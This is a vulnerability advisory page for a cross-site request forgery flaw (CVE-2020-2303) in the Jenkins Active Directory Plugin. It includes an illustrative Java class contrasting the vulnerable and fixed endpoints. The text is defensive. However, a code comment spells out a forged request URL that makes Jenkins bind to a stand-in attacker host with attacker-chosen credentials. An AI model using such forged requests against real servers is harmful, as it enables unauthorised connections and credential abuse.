Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0yd2Y1LTRtZjctdm1oM84AAmgX
CSRF vulnerability in Jenkins Active Directory Plugin
Jenkins Active Directory Plugin 2.19 and earlier does not require POST requests for multiple HTTP endpoints implementing connection and authentication tests, resulting in cross-site request forgery (CSRF) vulnerabilities.
Because the endpoints accept GET, an attacker who can get an authenticated Jenkins user to load a crafted page (the UI:R in the CVSS vector) can make Jenkins perform connection tests, binding to attacker-specified or previously configured Active Directory servers using attacker-specified credentials.
Active Directory Plugin 2.20 requires POST requests for the affected HTTP endpoints.
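The pattern behind this advisory, as an added illustration rather than code from the Active Directory Plugin: a Jenkins form-validation endpoint that performs a live directory bind, first in the shape that is reachable by GET and therefore forgeable, then in the shape the fix applies (`@RequirePOST`, plus a permission check). The class, method and parameter names (`DirectoryConnection`, `doTestConnection`, `server`, `bindUser`, `bindPassword`) and the LDAP bind helper are assumptions chosen for the example; the plugin's real endpoints are in the commit linked under References.

```java
package example;

import hudson.Extension;
import hudson.model.AbstractDescribableImpl;
import hudson.model.Descriptor;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import javax.naming.Context;
import javax.naming.NamingException;
import javax.naming.directory.InitialDirContext;
import java.util.Hashtable;

/** Hypothetical describable holding directory settings; not a class from the plugin. */
public class DirectoryConnection extends AbstractDescribableImpl<DirectoryConnection> {

    @Extension
    public static class DescriptorImpl extends Descriptor<DirectoryConnection> {

        @Override
        public String getDisplayName() {
            return "Directory connection (example)";
        }

        // VULNERABLE SHAPE (kept as a comment so the class compiles with one endpoint).
        // A Stapler web method without @RequirePOST is served for GET as well, and the
        // Jenkins CSRF crumb is only enforced on POST. So an <img> tag such as
        //   https://jenkins/descriptorByName/example.DirectoryConnection/testConnection?server=evil.example&bindUser=...&bindPassword=...
        // on any page an authenticated user views makes Jenkins bind to the
        // attacker's host with credentials the attacker chose.
        //
        // public FormValidation doTestConnection(@QueryParameter String server,
        //         @QueryParameter String bindUser, @QueryParameter String bindPassword) {
        //     return bind(server, bindUser, bindPassword);
        // }

        // HARDENED SHAPE (the pattern the 2.20 fix applies). @RequirePOST makes Stapler
        // reject non-POST requests (HTTP 405), so the call can only come from a form or
        // XHR that carries the CSRF crumb; the permission check additionally limits who
        // may trigger an outbound bind at all.
        @RequirePOST
        public FormValidation doTestConnection(@QueryParameter String server,
                                               @QueryParameter String bindUser,
                                               @QueryParameter String bindPassword) {
            Jenkins.get().checkPermission(Jenkins.ADMINISTER);
            return bind(server, bindUser, bindPassword);
        }

        /** Simple LDAP bind used to exercise the supplied settings (example helper). */
        private static FormValidation bind(String server, String bindUser, String bindPassword) {
            Hashtable<String, String> env = new Hashtable<>();
            env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
            env.put(Context.PROVIDER_URL, "ldaps://" + server + ":636");
            env.put(Context.SECURITY_AUTHENTICATION, "simple");
            env.put(Context.SECURITY_PRINCIPAL, bindUser);
            env.put(Context.SECURITY_CREDENTIALS, bindPassword);
            try {
                new InitialDirContext(env).close();
                return FormValidation.ok("Bind succeeded");
            } catch (NamingException e) {
                return FormValidation.error(e, "Bind failed: " + e.getMessage());
            }
        }
    }
}
```

Two points worth keeping in mind when reviewing a plugin for this class of bug: any `doXxx` method that has a side effect (here, an outbound bind that sends the supplied password to the supplied host) needs `@RequirePOST`, not only methods that change configuration; and the annotation alone does not authorise the caller, which is why the explicit permission check stays. To confirm the installed version on a running controller, the script console expression `Jenkins.instance.pluginManager.getPlugin('active-directory')?.version` (using the plugin's short name from the Maven coordinates above) should report 2.20 or later.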
Permalink: https://github.com/advisories/GHSA-2wf5-4mf7-vmh3
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yd2Y1LTRtZjctdm1oM84AAmgX
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 2 years ago
Updated: 12 months ago
CVSS Score: 4.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
EPSS Percentage: 0.00062
EPSS Percentile: 0.27513
Identifiers: GHSA-2wf5-4mf7-vmh3, CVE-2020-2303
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2303
- https://www.jenkins.io/security/advisory/2020-11-04/#SECURITY-2126
- http://www.openwall.com/lists/oss-security/2020/11/04/6
- https://github.com/jenkinsci/active-directory-plugin/commit/3558971237b80e71e913ead9e82a722e9d5576b8
- https://github.com/advisories/GHSA-2wf5-4mf7-vmh3
Blast Radius: 1.0
Affected Packages
maven:org.jenkins-ci.plugins:active-directory
Affected Version Ranges: < 2.20
Fixed in: 2.20